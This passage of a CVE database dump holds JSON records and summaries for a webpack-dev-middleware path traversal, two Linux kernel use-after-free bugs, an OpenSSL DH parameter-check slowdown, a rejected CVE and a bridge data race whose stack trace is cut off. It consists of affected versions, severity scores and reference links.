"https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82" }, { "name": "https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21" }, { "name": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v5.3.4", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v5.3.4" }, { "name": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v6.1.2", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v6.1.2" }, { "name": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v7.1.0", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v7.1.0" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:a:webpack.js:webpack-dev-middleware:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "webpack-dev-middleware", "vendor": "webpack.js", "versions": [ { "lessThan": "5.3.4", "status": "affected", "version": "0", "versionType": "custom" }, { "lessThan": "6.1.2", "status": "affected", "version": "6.0.0", "versionType": "custom" }, { "lessThan": "7.1.0", "status": "affected", "version": "7.0.0", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2024-29180", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-02T14:55:43.782623Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-02T14:58:57.526Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "webpack-dev-middleware", "vendor": "webpack", "versions": [ { "status": "affected", "version": "\u003e= 7.0.0, \u003c 7.1.0" }, { "status": "affected", "version": "\u003e= 6.0.0, \u003c 6.1.2" }, { "status": "affected", "version": "\u003c 5.3.4" } ] } ], "descriptions": [ { "lang": "en", "value": "Prior to versions 7.1.0, 6.1.2, and 5.3.4, the webpack-dev-middleware development middleware for devpack does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer\u0027s machine. The middleware can either work with the physical filesystem when reading the files or it can use a virtualized in-memory `memfs` filesystem. If `writeToDisk` configuration option is set to `true`, the physical filesystem is used. The `getFilenameFromUrl` method is used to parse URL and build the local file path. The public path prefix is stripped from the URL, and the `unsecaped` path suffix is appended to the `outputPath`. As the URL is not unescaped and normalized automatically before calling the midlleware, it is possible to use `%2e` and `%2f` sequences to perform path traversal attack.\n\nDevelopers using `webpack-dev-server` or `webpack-dev-middleware` are affected by the issue. When the project is started, an attacker might access any file on the developer\u0027s machine and exfiltrate the content. If the development server is listening on a public IP address (or `0.0.0.0`), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port). If the server allows access from third-party domains, an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files. Starting with fixed versions 7.1.0, 6.1.2, and 5.3.4, the URL is unescaped and normalized before any further processing." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-22", "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-21T16:47:53.848Z", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "name": "https://github.com/webpack/webpack-dev-middleware/security/advisories/GHSA-wr3j-pwj9-hqq6", "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/webpack/webpack-dev-middleware/security/advisories/GHSA-wr3j-pwj9-hqq6" }, { "name": "https://github.com/webpack/webpack-dev-middleware/commit/189c4ac7d2344ec132a4689e74dc837ec5be0132", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/webpack/webpack-dev-middleware/commit/189c4ac7d2344ec132a4689e74dc837ec5be0132" }, { "name": "https://github.com/webpack/webpack-dev-middleware/commit/9670b3495da518fe667ff3428c5e4cb9f2f3d353", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/webpack/webpack-dev-middleware/commit/9670b3495da518fe667ff3428c5e4cb9f2f3d353" }, { "name": "https://github.com/webpack/webpack-dev-middleware/commit/e10008c762e4d5821ed6990348dabf0d4d93a10e", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/webpack/webpack-dev-middleware/commit/e10008c762e4d5821ed6990348dabf0d4d93a10e" }, { "name": "https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82" }, { "name": "https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21" }, { "name": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v5.3.4", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v5.3.4" }, { "name": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v6.1.2", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v6.1.2" }, { "name": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v7.1.0", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/webpack/webpack-dev-middleware/releases/tag/v7.1.0" } ], "source": { "advisory": "GHSA-wr3j-pwj9-hqq6", "discovery": "UNKNOWN" }, "title": "webpack-dev-middleware Path Traversal vulnerability" } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2024-29180", "datePublished": "2024-03-21T16:47:53.848Z", "dateReserved": "2024-03-18T17:07:00.092Z", "dateUpdated": "2024-08-02T14:58:57.526Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4133
Vulnerability from cvelistv5
Published
2023-08-03 14:32
Modified
2024-11-15 16:31
Severity ?
EPSS score ?
Summary
A use-after-free vulnerability was found in the cxgb4 driver in the Linux kernel. The bug occurs when the cxgb4 device is detaching due to a possible rearming of the flower_stats_timer from the work queue. This flaw allows a local user to crash the system, causing a denial of service condition.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-4133 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2221702 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:17:12.136Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-4133" }, { "name": "RHBZ#2221702", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2221702" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::nfv", "cpe:/a:redhat:enterprise_linux:8::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Duoming Zhou for reporting this issue." } ], "datePublic": "2023-04-15T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability was found in the cxgb4 driver in the Linux kernel. The bug occurs when the cxgb4 device is detaching due to a possible rearming of the flower_stats_timer from the work queue. This flaw allows a local user to crash the system, causing a denial of service condition." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T16:31:07.052Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-4133" }, { "name": "RHBZ#2221702", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2221702" } ], "timeline": [ { "lang": "en", "time": "2023-07-10T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-04-15T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: cxgb4: use-after-free in ch_flower_stats_cb()", "x_redhatCweChain": "CWE-416: Use After Free" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-4133", "datePublished": "2023-08-03T14:32:12.421Z", "dateReserved": "2023-08-03T09:30:09.992Z", "dateUpdated": "2024-11-15T16:31:07.052Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-26609
Vulnerability from cvelistv5
This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Show details on NVD website{ "containers": { "cna": { "providerMetadata": { "dateUpdated": "2024-03-12T13:57:07.595Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "rejectedReasons": [ { "lang": "en", "value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2024-26609", "datePublished": "2024-02-29T15:52:15.228Z", "dateRejected": "2024-03-12T13:57:07.595Z", "dateReserved": "2024-02-19T14:20:24.130Z", "dateUpdated": "2024-03-12T13:57:07.595Z", "state": "REJECTED" }, "dataType": "CVE_RECORD", "dataVersion": "5.0" }
cve-2023-3817
Vulnerability from cvelistv5
Published
2023-07-31 15:34
Modified
2024-10-14 14:55
Severity ?
EPSS score ?
Summary
Issue summary: Checking excessively long DH keys or parameters may be very slow.
Impact summary: Applications that use the functions DH_check(), DH_check_ex()
or EVP_PKEY_param_check() to check a DH key or DH parameters may experience long
delays. Where the key or parameters that are being checked have been obtained
from an untrusted source this may lead to a Denial of Service.
The function DH_check() performs various checks on DH parameters. After fixing
CVE-2023-3446 it was discovered that a large q parameter value can also trigger
an overly long computation during some of these checks. A correct q value,
if present, cannot be larger than the modulus p parameter, thus it is
unnecessary to perform these checks if q is larger than p.
An application that calls DH_check() and supplies a key or parameters obtained
from an untrusted source could be vulnerable to a Denial of Service attack.
The function DH_check() is itself called by a number of other OpenSSL functions.
An application calling any of those other functions may similarly be affected.
The other functions affected by this are DH_check_ex() and
EVP_PKEY_param_check().
Also vulnerable are the OpenSSL dhparam and pkeyparam command line applications
when using the "-check" option.
The OpenSSL SSL/TLS implementation is not affected by this issue.
The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:08:50.496Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20230731.txt" }, { "name": "3.1.2 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a1eb62c29db6cb5eec707f9338aee00f44e26f5" }, { "name": "3.0.10 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9002fd07327a91f35ba6c1307e71fa6fd4409b7f" }, { "name": "1.1.1v git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=91ddeba0f2269b017dc06c46c993a788974b1aa5" }, { "name": "1.0.2zi patch (premium)", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=869ad69aadd985c7b8ca6f4e5dd0eb274c9f3644" }, { "tags": [ "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/43" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/07/31/1" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00019.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230818-0014/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/09/22/9" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/09/22/11" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231027-0008/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/11/06/2" }, { "tags": [ "x_transferred" ], "url": "https://security.gentoo.org/glsa/202402-08" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.1.2", "status": "affected", "version": "3.1.0", "versionType": "semver" }, { "lessThan": "3.0.10", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "1.1.1v", "status": "affected", "version": "1.1.1", "versionType": "custom" }, { "lessThan": "1.0.2zi", "status": "affected", "version": "1.0.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Bernd Edlinger" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Tomas Mraz" } ], "datePublic": "2023-07-31T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Issue summary: Checking excessively long DH keys or parameters may be very slow.\u003cbr\u003e\u003cbr\u003eImpact summary: Applications that use the functions DH_check(), DH_check_ex()\u003cbr\u003eor EVP_PKEY_param_check() to check a DH key or DH parameters may experience long\u003cbr\u003edelays. Where the key or parameters that are being checked have been obtained\u003cbr\u003efrom an untrusted source this may lead to a Denial of Service.\u003cbr\u003e\u003cbr\u003eThe function DH_check() performs various checks on DH parameters. After fixing\u003cbr\u003eCVE-2023-3446 it was discovered that a large q parameter value can also trigger\u003cbr\u003ean overly long computation during some of these checks. A correct q value,\u003cbr\u003eif present, cannot be larger than the modulus p parameter, thus it is\u003cbr\u003eunnecessary to perform these checks if q is larger than p.\u003cbr\u003e\u003cbr\u003eAn application that calls DH_check() and supplies a key or parameters obtained\u003cbr\u003efrom an untrusted source could be vulnerable to a Denial of Service attack.\u003cbr\u003e\u003cbr\u003eThe function DH_check() is itself called by a number of other OpenSSL functions.\u003cbr\u003eAn application calling any of those other functions may similarly be affected.\u003cbr\u003eThe other functions affected by this are DH_check_ex() and\u003cbr\u003eEVP_PKEY_param_check().\u003cbr\u003e\u003cbr\u003eAlso vulnerable are the OpenSSL dhparam and pkeyparam command line applications\u003cbr\u003ewhen using the \"-check\" option.\u003cbr\u003e\u003cbr\u003eThe OpenSSL SSL/TLS implementation is not affected by this issue.\u003cbr\u003e\u003cbr\u003eThe OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue." } ], "value": "Issue summary: Checking excessively long DH keys or parameters may be very slow.\n\nImpact summary: Applications that use the functions DH_check(), DH_check_ex()\nor EVP_PKEY_param_check() to check a DH key or DH parameters may experience long\ndelays. Where the key or parameters that are being checked have been obtained\nfrom an untrusted source this may lead to a Denial of Service.\n\nThe function DH_check() performs various checks on DH parameters. After fixing\nCVE-2023-3446 it was discovered that a large q parameter value can also trigger\nan overly long computation during some of these checks. A correct q value,\nif present, cannot be larger than the modulus p parameter, thus it is\nunnecessary to perform these checks if q is larger than p.\n\nAn application that calls DH_check() and supplies a key or parameters obtained\nfrom an untrusted source could be vulnerable to a Denial of Service attack.\n\nThe function DH_check() is itself called by a number of other OpenSSL functions.\nAn application calling any of those other functions may similarly be affected.\nThe other functions affected by this are DH_check_ex() and\nEVP_PKEY_param_check().\n\nAlso vulnerable are the OpenSSL dhparam and pkeyparam command line applications\nwhen using the \"-check\" option.\n\nThe OpenSSL SSL/TLS implementation is not affected by this issue.\n\nThe OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue." } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Low" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-606", "description": "CWE-606 Unchecked Input for Loop Condition", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-14T14:55:48.907Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20230731.txt" }, { "name": "3.1.2 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a1eb62c29db6cb5eec707f9338aee00f44e26f5" }, { "name": "3.0.10 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9002fd07327a91f35ba6c1307e71fa6fd4409b7f" }, { "name": "1.1.1v git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=91ddeba0f2269b017dc06c46c993a788974b1aa5" }, { "name": "1.0.2zi patch (premium)", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=869ad69aadd985c7b8ca6f4e5dd0eb274c9f3644" } ], "source": { "discovery": "UNKNOWN" }, "title": "Excessive time spent checking DH q parameter value", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2023-3817", "datePublished": "2023-07-31T15:34:13.627Z", "dateReserved": "2023-07-21T08:47:25.638Z", "dateUpdated": "2024-10-14T14:55:48.907Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-51780
Vulnerability from cvelistv5
Published
2023-12-25 00:00
Modified
2024-08-02 22:48
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel before 6.6.8. do_vcc_ioctl in net/atm/ioctl.c has a use-after-free because of a vcc_recvmsg race condition.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:48:11.351Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/24e90b9e34f9e039f56b5f25f6e6eb92cdd8f4b3" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.6.8" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3711-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240419-0001/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel before 6.6.8. do_vcc_ioctl in net/atm/ioctl.c has a use-after-free because of a vcc_recvmsg race condition." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-04-19T07:06:01.941453", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/24e90b9e34f9e039f56b5f25f6e6eb92cdd8f4b3" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.6.8" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3711-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, { "url": "https://security.netapp.com/advisory/ntap-20240419-0001/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-51780", "datePublished": "2023-12-25T00:00:00", "dateReserved": "2023-12-25T00:00:00", "dateUpdated": "2024-08-02T22:48:11.351Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52578
Vulnerability from cvelistv5
Published
2024-03-02 21:59
Modified
2024-12-19 08:21
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: bridge: use DEV_STATS_INC()
syzbot/KCSAN reported data-races in br_handle_frame_finish() [1]
This function can run from multiple cpus without mutual exclusion.
Adopt SMP safe DEV_STATS_INC() to update dev->stats fields.
Handles updates to dev->stats.tx_dropped while we are at it.
[1]
BUG: KCSAN: data-race in br_handle_frame_finish / br_handle_frame_finish
read-write to 0xffff8881374b2178 of 8 bytes by interrupt on cpu 1:
br_handle_frame_finish+0xd4f/0xef0 net/bridge/br_input.c:189
br_nf_hook_thresh+0x1ed/0x220
br_nf_pre_routing_finish_ipv6+0x50f/0x540
NF_HOOK include/linux/netfilter.h:304 [inline]
br_nf_pre_routing_ipv6+0x1e3/0x2a0 net/bridge/br_netfilter_ipv6.c:178
br_nf_pre_routing+0x526/0xba0 net/bridge/br_netfilter_hooks.c:508
nf_hook_entry_hookfn include/linux/netfilter.h:144 [inline]
nf_hook_bridge_pre net/bridge/br_input.c:272 [inline]
br_handle_frame+0x4c9/0x940 net/bridge/br_input.c:417
__netif_receive_skb_core+0xa8a/0x21e0 net/core/dev.c:5417
__netif_receive_skb_one_core net/core/dev.c:5521 [inline]
__netif_receive_skb+0x57/0x1b0 net/core/dev.c:5637
process_backlog+0x21f/0x380 net/core/dev.c:5965
__napi_poll+0x60/0x3b0 net/core/dev.c:6527
napi_poll net/core/dev.c:6594 [inline]
net_rx_action+0x32b/0x750 net/core/dev.c:6727
__do_softirq+0xc1/0x265 kernel/softirq.c:553
run_ksoftirqd+0x17/0x20 kernel/softirq.c:921
smpboot_thread_fn+0x30a/0x4a0 kernel/smpboot.c:164
kthread+0x1d7/0x210 kernel/kthread.c:388
ret_from_fork+0x48/0x60 arch/x86/kernel/process.c:147
ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304
read-write to 0xffff8881374b2178 of 8 bytes by interrupt on cpu 0:
br_handle_frame_finish+0xd4f/0xef0 net/bridge/br_input.c:189
br_nf_hook_thresh+0x1ed/0x220
br_nf_pre_routing_finish_ipv6+0x50f/0x540
NF_HOOK include/linux/netfilter.h:304 [inline]
br_nf_pre_routing_ipv6+0x1e3/0x2a0 net/bridge/br_netfilter_ipv6.c:178
br_nf_pre_routing+0x526/0xba0 net/bridge/br_netfilter_hooks.c:508
nf_hook_entry_hookfn include/linux/netfilter.h:144 [inline]
